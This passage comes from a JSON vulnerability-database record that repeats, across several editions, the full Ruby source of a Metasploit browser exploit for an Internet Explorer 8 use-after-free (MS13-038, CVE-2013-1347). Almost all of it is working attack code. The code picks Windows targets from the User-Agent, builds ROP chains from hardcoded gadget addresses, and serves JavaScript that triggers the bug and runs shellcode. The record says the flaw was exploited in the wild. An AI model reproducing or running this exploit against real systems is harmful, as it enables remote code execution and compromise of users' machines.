end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-10-26T23:40:49", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-10-27T01:41:43", "history": [], "viewCount": 46, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-10-27T01:41:43", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-11-08T23:42:55", "history": [], "viewCount": 46, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-11-08T23:42:55", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-11-09T01:37:21", "history": [], "viewCount": 49, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-11-09T01:37:21", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-11-26T10:05:32", "history": [], "viewCount": 49, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise 